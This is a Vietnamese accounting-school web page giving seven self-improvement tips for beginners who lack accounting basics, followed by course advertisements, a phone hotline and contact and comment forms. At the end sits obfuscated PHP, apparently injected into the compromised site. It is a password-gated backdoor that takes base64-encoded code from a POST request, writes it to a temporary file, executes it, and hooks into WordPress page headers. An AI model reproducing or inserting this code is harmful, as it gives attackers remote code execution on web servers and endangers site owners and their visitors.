1

LỘ TRÌNH CẢI THIỆN BẢN THÂN DÀNH CHO NGƯỜI MẤT GỐC KẾ TOÁN or CHƯA BIẾT GÌ VỀ KẾ TOÁN

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

KẾ TOÁN HÀ NỘI GROUP xin chia sẻ cho các bạn mới muốn học nghề và theo làm nghề kế toán về: LỘ TRÌNH CẢI THIỆN BẢN THÂN DÀNH CHO NGƯỜI MẤT GỐC KẾ TOÁN or CHƯA BIẾT GÌ VỀ KẾ TOÁN, MỚI BẮT ĐẦU TỪ CON SỐ 0


– Thời gian gần đây rất nhiều bạn hỏi mình về đào tạo kế toán cho người mất gốc hoặc chuyển từ ngành khác, công việc khác qua vì mấy năm trở lại đây kinh tế bất ổn nên ai ai cũng bị ảnh hưởng tới công việc và thu nhập nên tìm cho mình một hướng mới một công việc mới có tính ổn định hơn nhất là đối với chị em phụ nữ, với gần 15 năm kinh nghiệm trong lĩnh vực đào tạo kế toán – tuyển sinh kế toán, mình xin đưa ra một số điểm cần lưu ý đối với các bạn mất gốc cần cải thiện bản thân mình trong công việc kế toán.


Thứ 1: Về mặt chuyên môn, việc mất gốc xuất phát từ thời điểm trong quá khứ vì lý do nào đó bạn không tập trung theo theo được kiến thức gốc hoặc học xong ra trường bạn không làm đúng chuyên ngành kế toán đã học, muốn sửa chữa nó phải bắt đầu lại từ điểm xuất phát ban đầu, yếu chỗ nào thì tập chung xây đựng lại chỗ đó. Không nên xây dựng từ ngọn xuống, nền tảng vững chắc sẽ giúp chúng ta có bước tiến xa, đối với kế toán hay bất kỳ một công việc nào cũng vậy.


Thứ 2: tìm cho mình một môi trường và người dẫn đường thật tốt, nếu bạn tìm được một người dẫn đường, một tấm gương giúp bạn học tập sẽ giúp con đường thành công ngắn hơn. Chủ động trong công việc như … ở lại sau giờ làm xấn vào hỗ trợ tích cực đồng nghiệp khi họ gặp khó khăn và công việc của họ đang bế tắc. Luôn giữ ở tâm thế luôn chủ động học hỏi không ngừng.


Thứ 3: giữ cho mình một tinh thần kỷ luật, luôn rèn luyện lại việc hạch toán Kế toán hàng ngày, trao đổi các bút toán với đồng nghiệp xung quanh, bắt đầu thực hành những bút toán bạn đã được học từ điều thứ nhất, Luôn nhớ rằng chỉ có thực hành mới có thể giúp bạn biến kiến thức từ sách vở thành của chính mình. Hạch toán kế toán chưa bao giờ là bước trở ngại đối với bạn, vậy nên các bạn cứ mạnh rạn và tự tin đừng rụt rè với những bút toán lạ và khó.


Thứ 4: Luôn giữ cho mình một tinh thần lạc quan và tâm huyết để có được thành công. Sẽ có thể trong lúc bạn học nhưng những người khác lướt FB, chơi Game, Tiktok, hãy xem việc học của bạn bây giờ là thú vui đối với bạn, bởi vì trong quá khứ bạn đã chơi hoặc dành thời gian cho một việc khác, còn họ đã kịp trau dồi kiến thức gốc Kế toán rồi. Nền tảng gốc Kế toán chính là nền móng vững chắc đưa bạn đến thành công trong con đường nghề nghệp của bạn.

 

Thứ 5: Mạnh rạn bày tỏ quan điểm cá nhân của bạn trong các cuộc họp của phòng KT hay các cuộc hội thảo, hãy mạnh rạn cho bản thân có cơ hội nạp thêm kiến thức từ những cuộc tranh luận. Nên nhớ tranh luận với tinh thần cầu thị và bắt đầu với câu hỏi “Why” và không nên dùng với câu hỏi bắt đầu từ “What”.


Thứ 6: Thường xuyên đọc và cập nhật các thông tư, nghị định, quy định về luật thuế… và một số luật liên quan như Luật doanh nghiệp, luật lao động, luật kinh tế… và một số bộ luật khác có liên quan đến ngành nghề mà công ty bạn đang kinh doanh. Điều này rất quan trọng vì nó sẽ giúp ích cho bạn là không cần phải đi dọn rác về sau đấy.


Thứ 7 cũng là điều cuối mình muốn chia sẻ. Kế toán không phải là con đường duy nhất giúp bạn thành công và cũng không phải là con đường duy nhất có thể kiếm tiền giúp chúng ta trang trải cuộc sống. Luôn giữ vững cho tư tưởng và đầu óc được tỉnh táo để đưa ra những lựa chọn quyết định phù hợp cho chính bản thân mình tùy thuộc vào từng giai đoạn phù hợp đúng với thời điểm. Nhưng dù bạn có làm Kế toán hay bất kỳ ngành nghề nào đi nữa thì vẫn luôn giữ lửa tinh thần luôn sẵn sàng học hỏi không ngừng và nỗ lực sẽ giúp bạn đi đến con đường thành công không xa.

———-0———-

– Chuyên cung cấp khóa HỌC KẾ TOÁN THỰC HÀNH THỰC CHIẾN ĐỂ RA NGHỀ ĐI LÀM NGAY
– NHẬN DẠY KẾ TOÁN CHO NGƯỜI CHƯA BIẾT GÌ HOẶC MẤT GỐC
– Dạy nâng cao để thành thạo kế toán tổng hợp. Dạy kèm riêng 1-1 kế toán theo mọi nhu cầu
CUNG CẤP DỊCH VỤ KẾ TOÁN TRỌN GÓI UY TÍN – GIÁ RẺ CHO DOANH NGHIỆP
– Dạy Trực Tiếp tại các chi nhánh trực thuộc toàn Quốc hoặc Onl Trực Tuyến, Inbox Zalo mình nhé – 0973.761.751 (Hotline)

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}